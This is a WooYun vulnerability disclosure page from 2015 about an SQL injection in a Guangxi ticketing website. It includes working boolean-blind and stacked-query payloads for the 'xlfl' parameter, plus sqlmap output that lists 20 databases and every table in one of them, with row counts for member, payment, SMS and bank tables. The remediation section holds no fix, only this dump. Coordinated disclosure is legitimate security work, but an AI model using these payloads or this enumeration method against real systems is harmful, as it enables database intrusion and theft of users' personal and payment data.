广西票务网某处SQL注入 | wooyun-2015-0161115| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0161115

漏洞标题：广西票务网某处SQL注入

漏洞作者：路人甲

提交时间：2015-12-14 01:58

修复时间：2016-01-28 17:10

公开时间：2016-01-28 17:10

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-14：细节已通知厂商并且等待厂商处理中
2015-12-18：厂商已经确认，细节仅向厂商公开
2015-12-28：细节向核心白帽子及相关领域专家公开
2016-01-07：细节向普通白帽子公开
2016-01-17：细节向实习白帽子公开
2016-01-28：细节向公众公开

简要描述：

详细说明：

http://**.**.**.**/xianlusearch.html?xlfl=%E5%8C%BA%E5%A4%96%E7%BA%BF%E8%B7%AF

http://**.**.**.**/PerformSearch.aspx?search=

漏洞证明：

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: xlfl (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: xlfl=%E5%8C%BA%E5%A4%96%E7%BA%BF%E8%B7%AF' AND 9370=9370 AND 'soYu'='soYu
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: xlfl=%E5%8C%BA%E5%A4%96%E7%BA%BF%E8%B7%AF';WAITFOR DELAY '0:0:5'--
---
[23:50:02] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[23:50:02] [INFO] fetching database names
[23:50:02] [INFO] fetching number of databases
[23:50:02] [INFO] resumed: 20
[23:50:02] [INFO] resumed: card
[23:50:02] [INFO] resumed: card950
[23:50:02] [INFO] resumed: gxpiao_jxc
[23:50:02] [INFO] resumed: gxpwdb
[23:50:02] [INFO] resumed: gxpwdraw02
[23:50:02] [INFO] resumed: gxpwdraw03
[23:50:02] [INFO] resumed: gxpwmember_lzys
[23:50:02] [INFO] resumed: gxpwticket
[23:50:02] [INFO] resumed: gxpwticket_wz
[23:50:02] [INFO] resumed: hypiaodb
[23:50:02] [INFO] resumed: master
[23:50:02] [INFO] resumed: microeticket
[23:50:02] [INFO] resumed: model
[23:50:02] [INFO] resumed: msdb
[23:50:02] [INFO] resumed: qitangdb
[23:50:02] [INFO] resumed: tempdb
[23:50:02] [INFO] resumed: testticket
[23:50:02] [INFO] resumed: wagaticket
[23:50:02] [INFO] resumed: weipiao_wap
[23:50:02] [INFO] resumed: weipiao_web
available databases [20]:
[*] card
[*] card950
[*] gxpiao_jxc
[*] gxpwdb
[*] gxpwdraw02
[*] gxpwdraw03
[*] gxpwmember_lzys
[*] gxpwticket
[*] gxpwticket_wz
[*] hypiaodb
[*] master
[*] microeticket
[*] model
[*] msdb
[*] qitangdb
[*] tempdb
[*] testticket
[*] wagaticket
[*] weipiao_wap
[*] weipiao_web

修复方案：

Database: gxpwdb
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| dbo.M_telList                  | 186864  |
| dbo.audit_table                | 152779  |
| dbo.M_Voucher                  | 150000  |
| dbo.M_Perfrom_JD_MX            | 99294   |
| dbo.UV_MovieTicket_JD          | 99294   |
| dbo.UV_perfrom_jd_MX           | 99294   |
| dbo.AppMobileLog               | 92788   |
| dbo.UV_User_Orders             | 90462   |
| dbo.M_Member                   | 85629   |
| dbo.UV_GXPW_Pay                | 84634   |
| dbo.View_6                     | 81125   |
| dbo.m_JD_number                | 72355   |
| dbo.M_Perfrom_JD               | 69910   |
| dbo.UV_Perfrom_JD              | 69910   |
| dbo.View_2                     | 61289   |
| dbo.AppPrizeRecord             | 55778   |
| dbo.M_member_value             | 38078   |
| dbo.SMS                        | 35488   |
| dbo.M_menpiao_JD               | 34826   |
| dbo.M_menpiao_JD_Mx            | 34657   |
| dbo.UV_menpiao_JD_Count_report | 33932   |
| dbo.UV_menpiao_JD_report       | 33932   |
| dbo.UV_User_menpiao            | 33834   |
| dbo.M_Spdz                     | 30692   |
| dbo.M_dianzipiao               | 24292   |
| dbo.buser                      | 24065   |
| dbo.M_dianzipiao_Mx            | 16585   |
| dbo.View_1                     | 13917   |
| dbo.SMS_Verifi                 | 10990   |
| dbo.M_qpdj                     | 9294    |
| dbo.AppMobileLogin             | 8685    |
| dbo.UV_Order_recycling         | 7356    |
| dbo.M_airline_JD_Mx            | 6950    |
| dbo.UV_airticket_caiwu         | 6905    |
| dbo.M_Perfrom_jw               | 6823    |
| dbo.W_SUBSTATION_CFG           | 6741    |
| dbo.M_message                  | 6012    |
| dbo.UV_message                 | 6012    |
| dbo.AppMobileCount             | 5921    |
| dbo.AppMobilePoLogin           | 5823    |
| dbo.M_airline_JD               | 4727    |
| dbo.UV_airticket               | 4663    |
| dbo.M_airline_JD_PNR           | 4639    |
| dbo.M_ApplyTable               | 4147    |
| dbo.M_Fenxiao_sjjg             | 3952    |
| dbo.Jc_GnWeb                   | 3760    |
| dbo.UV_CM_GnQx                 | 3760    |
| dbo.UV_Fenxiao_MX              | 3613    |
| dbo.M_Area                     | 3523    |
| dbo.M_ycyd                     | 2877    |
| dbo.errCode                    | 2421    |
| dbo.M_Splike                   | 2304    |
| dbo.UV_menpiao_jd_fenxiao      | 1135    |
| dbo.Jc_Dy_Menu_Button          | 1042    |
| dbo.UV_Menu_Button             | 1042    |
| dbo.SMS_MO                     | 979     |
| dbo.UV_Perfrom_jd_fenxiao      | 967     |
| dbo.JC_Airport                 | 959     |
| dbo.N_News                     | 866     |
| dbo.AppDownInfo                | 842     |
| dbo.M_Menpiao_Mx               | 756     |
| dbo.M_movieTicket_JD           | 696     |
| dbo.M_movieTicket_JD_Mx        | 693     |
| dbo.M_Fapiao                   | 632     |
| dbo.M_Perform                  | 548     |
| dbo.UV_perform_cg              | 548     |
| dbo.M_HotelInfo_Mx             | 547     |
| dbo.View_5                     | 504     |
| dbo.M_project                  | 492     |
| dbo.M_MovieTime                | 488     |
| dbo.M_Code                     | 477     |
| dbo.View_4                     | 477     |
| dbo.View_3                     | 453     |
| dbo.M_merchant_user            | 413     |
| dbo.M_Advertis                 | 412     |
| dbo.Jc_Mj                      | 411     |
| dbo.UV_MovieTicket_Time        | 383     |
| dbo.M_Fenxiao_Mb_Mx            | 374     |
| dbo.M_mooncake_Dst             | 360     |
| dbo.UV_perform_All             | 351     |
| dbo.UV_Perform_Phone           | 351     |
| dbo.M_inMoney                  | 296     |
| dbo.M_SecondBuy                | 268     |
| dbo.M_Menpiao                  | 240     |
| dbo.View_ycmc                  | 223     |
| dbo.Jc_SystemMenu              | 218     |
| dbo.M_merchant                 | 212     |
| dbo.M_UserCollect              | 199     |
| dbo.M_Voucher_MX               | 188     |
| dbo.M_Movie                    | 177     |
| dbo.M_mooncake                 | 147     |
| dbo.M_airline_Xx               | 134     |
| dbo.M_xianlu_Mx                | 128     |
| dbo.M_Perfrom_yccg             | 119     |
| dbo.Jc_Users                   | 109     |
| dbo.UV_Jc_Users                | 109     |
| dbo.Jc_Dy_Users_Role           | 107     |
| dbo.UV_Users_Role              | 107     |
| dbo.Jc_Ryda                    | 104     |
| dbo.M_member_money             | 104     |
| dbo.M_QA                       | 100     |
| dbo.M_AdvertisType             | 96      |
| dbo.M_HotelInfo                | 93      |
| dbo.M_xianlu                   | 79      |
| dbo.Sys_Table_No               | 71      |
| dbo.M_HotelInfo_JD             | 64      |
| dbo.M_subject                  | 56      |
| dbo.M_Perform_cc               | 55      |
| dbo.Jc_System                  | 46      |
| dbo.AppFeedBack                | 35      |
| dbo.M_mooncake_FL              | 34      |
| dbo.M_about                    | 31      |
| dbo.M_Ddlczt_bak               | 26      |
| dbo.CM_CG_ddMx                 | 25      |
| dbo.M_HomePageCfg_UnWork2      | 25      |
| dbo.M_Member_bank              | 25      |
| dbo.UV_CM_CG_dd                | 25      |
| dbo.M_Ddlczt                   | 24      |
| dbo.Jc_Role                    | 22      |
| dbo.M_Cuxiao                   | 22      |
| dbo.Jc_Dy_Users_Gw             | 20      |
| dbo.M_codeMachine              | 20      |
| dbo.UV_Ry                      | 20      |
| dbo.M_HomePageCfg_UnWork       | 19      |
| dbo.M_xianlu_back              | 19      |
| dbo.Jc_Bm                      | 17      |
| dbo.M_xianlu_JD                | 17      |
| dbo.M_xianlu_JD_Mx             | 17      |
| dbo.Jc_airtype                 | 16      |
| dbo.M_Substation               | 16      |
| dbo.M_Ddzt                     | 15      |
| dbo.UV_User_xianlu             | 15      |
| dbo.UV_xianlu_JD_report        | 15      |
| dbo.Jc_Button                  | 12      |
| dbo.M_RedirectPage             | 12      |
| dbo.CM_CG_dd                   | 11      |
| dbo.CM_CG_thdMx                | 11      |
| dbo.YoungTb                    | 11      |
| dbo.M_Fenxiao_Mb               | 10      |
| dbo.M_hotSearch                | 10      |
| dbo.M_Zcsx                     | 10      |
| dbo.M_mooncake_JD              | 9       |
| dbo.M_mooncake_JD_MX           | 9       |
| dbo.M_Psfs                     | 9       |
| dbo.UV_Moon_Pay                | 9       |
| dbo.UV_user_mooncake           | 9       |
| dbo.CM_CG_thd                  | 7       |
| dbo.CM_Jxc_Khxx                | 6       |
| dbo.CM_Jxc_Splb                | 6       |
| dbo.M_Menpiao_hd               | 6       |
| dbo.CM_Jxc_Gysfl               | 5       |
| dbo.M_Fenxiao_log              | 5       |
| dbo.M_HotelInfo_JD_Mx          | 5       |
| dbo.M_MovieSite                | 5       |
| dbo.M_MovieTicket              | 5       |
| dbo.CM_Jxc_Spxx                | 4       |
| dbo.Jc_Ck                      | 4       |
| dbo.Jc_Dw                      | 4       |
| dbo.Jc_Kjqj                    | 4       |
| dbo.Jc_Rygwb                   | 4       |
| dbo.Jc_YhGzzm                  | 4       |
| dbo.M_AgenPrice                | 4       |
| dbo.M_Integral                 | 4       |
| dbo.M_Perform_Config           | 4       |
| dbo.UV_Splb_Spxx               | 4       |
| dbo.AppPrizeList               | 3       |
| dbo.AppPrizeUser               | 3       |
| dbo.CM_Jxc_Khfl                | 3       |
| dbo.CM_CK_CkdMx                | 2       |
| dbo.CM_CK_rkd                  | 2       |
| dbo.CM_CK_rkdMx                | 2       |
| dbo.CM_Jxc_Spfzb               | 2       |
| dbo.UV_CM_CG_rkd               | 2       |
| dbo.UV_Spxx_Spfzb              | 2       |
| dbo.CM_CK_ckd                  | 1       |
| dbo.CM_Jxc_Gysxx               | 1       |
| dbo.D99_REG                    | 1       |
| dbo.M_merchant_group           | 1       |
| dbo.N_HireInfo                 | 1       |
| dbo.NFCUser                    | 1       |
| dbo.SMS_Verifi_txt             | 1       |
+--------------------------------+---------+

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-12-18 15:20

厂商回复：

CNVD确认并复现所述漏洞情况，已经转由CNCERT下发给广西分中心，由广西分中心后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0161115

漏洞标题：广西票务网某处SQL注入

相关厂商：广西票务网

漏洞作者：路人甲

提交时间：2015-12-14 01:58

修复时间：2016-01-28 17:10

公开时间：2016-01-28 17:10

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0161115

漏洞标题：广西票务网某处SQL注入

相关厂商：广西票务网

漏洞作者： 路人甲

提交时间：2015-12-14 01:58

修复时间：2016-01-28 17:10

公开时间：2016-01-28 17:10

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0161115"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云